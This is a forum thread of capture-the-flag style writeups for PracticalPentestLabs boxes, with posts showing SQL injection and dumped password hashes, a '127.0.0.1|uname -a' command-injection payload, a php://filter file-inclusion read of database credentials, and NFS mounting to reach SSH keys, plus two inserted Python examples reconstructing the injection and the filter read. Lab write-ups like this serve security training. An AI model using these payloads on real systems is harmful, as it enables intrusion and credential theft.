Ok guys, I just changed the post title so we can have writeups for boxes inside that PracticalPentestLabs.com lab here
Writeup structure:
HOSTNAME: … / IP: …
[spoiler] writeup_text [/spoiler]
Cheers !
Never heard about it before. Seems quite new though, and there is no about page, at least none I could find at first sight. Might check it out when I have some spare time. So most likely not before mid August…
Much appreciated Mr Rick !
I never heard of it. Thanks a lot
No problem @cecu, if you successfully PWN “HIGINI” give us some hints … it’s a pain !
Thanks for the share! I just saw that ‘HAGINI’ and got command execution on it already, but i don’t know what to do with it, nothing to read
Awesome, @exploit … yeah there isn’t a flag submission system there, they are working on it as per their latest tweet
Can you write a small walk-through on how you did "HIGINI"?
We know the current UI and website interface are crappy, we are working on something new. In the meantime you can still join and practice
— PracticalPentestLabs (@ppentestlabs) June 10, 2017
HOSTNAME: C3PO / IP: 10.0.1.6
I found an SQLi in the search box:
http://10.0.1.6/inc/search.php?query=xxx
By adding a single quote you get the error message.
I used sqlmap for a quick injection.
As you see, 3 types of injection …
Anyway
select table_name FROM information_schema.tables where table_schema='vuln' [13]:
[*] adrbook
[*] eshop_goods
[*] eshop_orders
[*] flashgames
[*] log
[*] messages
[*] provozovny
[*] review_answers
[*] review_category
[*] review_questions
[*] statistics
[*] tickets
[*] users
select column_name from information_schema.columns where table_name='users' [10]:
[*] alterpass
[*] heslo
[*] id
[*] image
[*] isadmin
[*] login
[*] nick
[*] remail
[*] secondmail
[*] telefon
SELECT id,login,heslo,isadmin FROM users [13]:
[*] 1, karel, f196c5c9a5f002d14cfc2aafce74e39b, 0
[*] 2, jana, 3f858cf8cfd59f25010e71b6b5671428, 0
[*] 12, michal, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 13, Smolicek, 593a90797681ebd0b8c44315a4caf6ff, 0
[*] 14, jezinky, 4475987873e549d5208f8ad743fc3d07, 0
[*] 15, utocnik, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 18, uzivatel, 32250170a0dca92d53ec9624f336ca24, 0
[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1
[*] 23, prochy, 32f055ca38a83ecb670b04edb50016ad, 0
[*] 24, prochy2, 2d8883c2d85b14fdcb44e3b3dc959535, 0
[*] 25, butterfly2, 1adbb3178591fd5bb0c248518f39bf6d, 0
[*] 26, test, 098f6bcd4621d373cade4e832627b4f6, 0
[*] 27, qyqouxmg, ae219661afe50f60419afbe08c45947d, 0
The only user with admin privileges is admin himself:
[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1
Login …
Go to this option:
As we know, the ping option uses the "system" function, or "exec", or similar, so it's clear that this box is vulnerable.
Let me check if it works first; let's ping the local IP address 127.0.0.1.
Okay, cool.
To run several commands you have to use | as a separator between them.
The PHP code must be something like this:
<?php echo system("ping {$_GET['host']}"); ?>
So let's try sending this request:
127.0.0.1|uname -a
Works fine.
Whatever …
I tried to upload a PHP shell using "wget" but got nothing …
I read some PHP files using the "cat" command.
That led me to the config file named "base.php":
// .... PHP code
$mysqlServer = 'localhost';
$mysqlUser = 'vuln';
$mysqlPassword = 'vuln';
$mysqlName = 'vuln';
// .... PHP code
… To be continued
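An added example, not code from DamaneDz's post or from PracticalPentestLabs, covering two points of the C3PO writeup: the ping form's command injection and the dumped password hashes. It reconstructs the shell string a back end like `<?php echo system("ping {$_GET['host']}"); ?>` would execute, shows why `127.0.0.1|uname -a` runs a second command, and contrasts it with the check a fixed version would apply (validate the value as an IP literal, then quote it). The MD5 helper checks the one dumped hash whose plaintext is known, the `test` account's `098f6bcd4621d373cade4e832627b4f6`, which is md5("test"); the wordlist is constructed and the admin hash is deliberately left uncracked. All function names are mine.

```python
# Added example: not the lab's code and not the post author's. Reconstructs
# the C3PO ping injection and a hardened counterpart, plus an MD5 dictionary
# check against the dumped 'heslo' (password) column.
import hashlib
import ipaddress
import shlex
from typing import Iterable, Optional


def vulnerable_ping_command(host: str) -> str:
    """Mirror the unsafe PHP: the raw parameter is concatenated into the
    command line that /bin/sh parses, shell metacharacters included."""
    return f"ping {host}"


def injection_payload(command: str, host: str = "127.0.0.1") -> str:
    """A pipe terminates the ping command; everything after it runs as a
    separate command. ';', '&&' and $(...) would work the same way."""
    return f"{host}|{command}"


def validate_host(host: str) -> bool:
    """Hardened check: accept only a syntactically valid IPv4/IPv6 literal,
    which can never contain shell metacharacters or extra ping flags."""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def safe_ping_command(host: str) -> str:
    """Validated *and* quoted (defence in depth), with a bounded packet count
    so the endpoint cannot be used to keep a ping running indefinitely."""
    if not validate_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return "ping -c 1 " + shlex.quote(host)


def looks_like_md5(digest: str) -> bool:
    """32 hex characters, as in the dump, is consistent with unsalted MD5."""
    return len(digest) == 32 and all(c in "0123456789abcdef" for c in digest.lower())


def crack_md5(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Tiny dictionary attack: return the candidate whose MD5 matches, else None."""
    target = digest.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


if __name__ == "__main__":
    payload = injection_payload("uname -a")
    print("vulnerable:", vulnerable_ping_command(payload))  # ping 127.0.0.1|uname -a
    print("validated :", validate_host(payload))            # False
    print("hardened  :", safe_ping_command("127.0.0.1"))    # ping -c 1 127.0.0.1
    # Constructed wordlist (assumption); only the 'test' user's hash from the
    # dump is known to be md5("test"). The admin hash stays uncracked here.
    print(crack_md5("098f6bcd4621d373cade4e832627b4f6", ["admin", "password", "test"]))  # test
```

The validation step is what actually closes the hole; `shlex.quote` alone would stop the pipe but still let a caller pass something like extra flags through a looser check, which is why the IP-literal test comes first.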
Awesome, thank you guys. Looking forward to more
HOSTNAME: TADDEO / IP: 10.0.3.10
Let's add "name" as a parameter to our request.
Nothing shown! Let's add phpinfo.php.
Looks like LFI (Local File Inclusion) …
Let's read the config.php file via a PHP filter:
php://filter/convert.base64-encode/resource=config.php
We get base64-encoded output:
<?php
define( 'DB_NAME', 'test' );
/** MySQL database username */
define( 'DB_USER', 'taddeo' );
/** MySQL database password */
define( 'DB_PASSWORD', 'taddeo@321' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
?>
This is the code after decoding …
Now let's read the /etc/passwd file:
view-source:http://10.0.3.10/file.php?name=/etc/passwd
I'm trying to upload a PHP shell.
So I'll update this post if there is anything important, or I'll try to solve another challenge!
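An added example, not code from DamaneDz's post or from the lab, for the php://filter read used against TADDEO: it builds the `file.php?name=...` URL with the `convert.base64-encode` wrapper, decodes the base64 the server hands back, and pulls the `define()` constants out of the recovered config.php. The HTTP body is constructed from the config shown in the post and encoded locally, so nothing is sent over the network; function names and the regex are my own.

```python
# Added example: not from the post or from PracticalPentestLabs. Builds the
# TADDEO php://filter URL and parses the config that comes back, offline.
import base64
import re
from typing import Dict
from urllib.parse import urlencode


def lfi_filter_url(base_url: str, param: str, resource: str) -> str:
    """Wrap the target in convert.base64-encode so include() returns the PHP
    source as text instead of executing it; a plain ?name=config.php would
    run the file and show nothing useful, which is why the raw path is only
    used for non-PHP files such as /etc/passwd."""
    wrapper = f"php://filter/convert.base64-encode/resource={resource}"
    return f"{base_url}?{urlencode({param: wrapper}, safe=':/=')}"


def decode_filter_response(body: str) -> str:
    """The filter output is one base64 blob, possibly surrounded by page
    whitespace; non-strict b64decode discards characters outside the alphabet."""
    return base64.b64decode(body).decode("utf-8", errors="replace")


# define( 'NAME', 'value' ); with either quote style and optional spacing
_DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def extract_defines(php_source: str) -> Dict[str, str]:
    """Collect define('NAME', 'value') pairs, the WordPress-style layout
    seen in TADDEO's config.php."""
    return {name: value for name, value in _DEFINE_RE.findall(php_source)}


def harvest_config(body: str) -> Dict[str, str]:
    """Full pipeline: base64 body from the server -> constant/value map."""
    return extract_defines(decode_filter_response(body))


# Constructed sample (assumption): the config.php contents reported in the
# post, encoded the way the server would return them through the filter.
SAMPLE_CONFIG_SOURCE = """<?php
define( 'DB_NAME', 'test' );
/** MySQL database username */
define( 'DB_USER', 'taddeo' );
/** MySQL database password */
define( 'DB_PASSWORD', 'taddeo@321' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
?>
"""
SAMPLE_RESPONSE = base64.b64encode(SAMPLE_CONFIG_SOURCE.encode()).decode()


if __name__ == "__main__":
    print(lfi_filter_url("http://10.0.3.10/file.php", "name", "config.php"))
    for key, value in harvest_config(SAMPLE_RESPONSE).items():
        print(f"{key} = {value}")
```

The credentials recovered this way are exactly what the next post reuses for SSH, so the decode step is worth automating when an LFI exposes several config files at once.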
HOSTNAME: TADDEO / IP: 10.0.3.10
Did the same as DamaneDz
Then I used the MySQL user to log in to SSH.
Then managed to escalate my privs to root.
I did a quick search for the flag but didn't have any luck.
Any ideas?
HOSTNAME: RASIM / IP: 10.0.3.11
Quick nmap scan:
Nmap scan report for 10.0.3.11
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs
I tried to mount the NFS share locally:
mount 10.0.3.11:/ /test/
After a bit of digging around I found that /home/rasim/ had SSH keys in it.
Haven't attempted to replace them yet, but I'm guessing that should give us SSH access to the box.
10.0.1.6
Hi,
Should I not be able to ping my attack PC?
I am trying to get a shell, but seeing that I am unable to even ping my PC, the shell won't connect back. Or is this part of the challenge?
Thanks
Good job on TADDEO and RASIM. I was able to get a shell the same way, although I did find the FLAG in the root/ directory of the host; I think you should check back when the hosts are reverted.
10.0.1.6
Hi,
Should I not be able to ping my attack PC?
I am trying to get a shell, but seeing that I am unable to even ping my PC, the shell won't connect back. Or is this part of the challenge?
Thanks
I think it's part of the challenge; I was able to bypass that though.
There are no hints in the challenges, so I thought I only had to exploit them.
Anyway, I solved the first part and you can solve the second.
Any hints on how you got root on C3PO?
I have a shell and I thought the overlayfs exploit might work, but I couldn't seem to get it to work. I also tried a few others and they just seemed to crash the server.
Why @_py ? is there a limit on how much replies per post ?
@h4x0r: Imagine me and 2-3 other folks tackling picoCTF, which lasts for 2 weeks, on the forum. It'd be much more convenient if you just hang out on IRC, and at the same time you won't be overshadowing other posts.
I agree with @_py. The IRC is the ultimate place for figuring stuff out and solving problems. The forum is a place for discussion, perhaps writeups, how you did it, or one or two issues you may be facing. But a conversation about breaking it, that is a job for the IRC.
If you have ever used Facebook, would you have a conversation in the comment section? That is what this may be like.